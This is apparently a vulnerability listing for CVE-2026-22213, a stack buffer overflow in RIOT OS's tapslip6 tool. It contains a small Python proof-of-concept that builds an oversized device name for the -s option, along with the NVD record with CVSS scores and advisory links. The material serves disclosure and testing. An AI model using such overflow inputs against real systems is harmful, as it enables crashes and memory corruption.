CVE-2026-22213

#!/usr/bin/env python3 """ CVE-2026-22213 PoC - RIOT OS tapslip6 Stack Buffer Overflow This PoC demonstrates the vulnerability by generating an oversized device name that triggers the buffer overflow in the devopen() function. """ import sys import subprocess def generate_payload(payload_length=1024): """Generate oversized device name to trigger overflow""" # Generate payload with repeated 'A' characters # This will overflow the fixed-size stack buffer return 'A' * payload_length def test_vulnerability(): """Test for the buffer overflow vulnerability""" print(f"[*] CVE-2026-22213 PoC - RIOT OS tapslip6 Buffer Overflow") print(f"[*] Generating payload with 1024 bytes...") payload = generate_payload(1024) # Simulate the attack by passing oversized input # In real scenario, this would be passed to tapslip6 -s option print(f"[+] Payload length: {len(payload)} bytes") print(f"[+] Payload preview: {payload[:50]}...") print(f"[!] This oversized device name will overflow the stack buffer in devopen()") print(f"[!] The strcpy/strcat functions don't check bounds, causing overflow") return payload if __name__ == "__main__": test_vulnerability()

{"cve": {"id": "CVE-2026-22213", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:52.300", "lastModified": "2026-01-21T17:44:38.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RIOT OS versions up to and including 2026.01-devel-317 contain a stack-based buffer overflow vulnerability in the tapslip6 utility. The vulnerability is caused by unsafe string concatenation in the devopen() function, which constructs a device path using unbounded user-controlled input. The utility uses strcpy() and strcat() to concatenate the fixed prefix '/dev/' with a user-supplied device name provided via the -s command-line option without bounds checking. This allows an attacker to supply an excessively long device name and overflow a fixed-size stack buffer, leading to process crashes and memory corruption."}, {"lang": "es", "value": "Las versiones de RIOT OS hasta e incluyendo 2026.01-devel-317 contienen una vulnerabilidad de desbordamiento de búfer basado en pila en la utilidad tapslip6. La vulnerabilidad es causada por una concatenación de cadenas insegura en la función devopen(), que construye una ruta de dispositivo utilizando una entrada controlada por el usuario sin límites. La utilidad utiliza strcpy() y strcat() para concatenar el prefijo fijo '/dev/' con un nombre de dispositivo proporcionado por el usuario, suministrado a través de la opción de línea de comandos -s, sin verificación de límites. Esto permite a un atacante suministrar un nombre de dispositivo excesivamente largo y desbordar un búfer de pila de tamaño fijo, lo que lleva a fallos del proceso y corrupción de memoria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.10", "matchCriteriaId": "3EE45C18-0705-45D6-9363-63017333DFF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2026.01:devel:*:*:*:*:*:*", "matchCriteriaId": "51045419-7276-4017-8857-04DDBF865A1F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:riot-os:riot:2026.01:rc1:*:*:*:*:*:*", "matchCriteriaId": "D10D5F2C-4666-4D21-AED8-BE67DF223745"}]}]}], "references": [{"url": "https://github.com/RIOT-OS/RIOT", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://seclists.org/fulldisclosure/2026/Jan/15", "source": "[email protected]", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "https://www.riot-os.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/riot-os-stack-based-buffer-overflow-in-tapslip6-utility", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}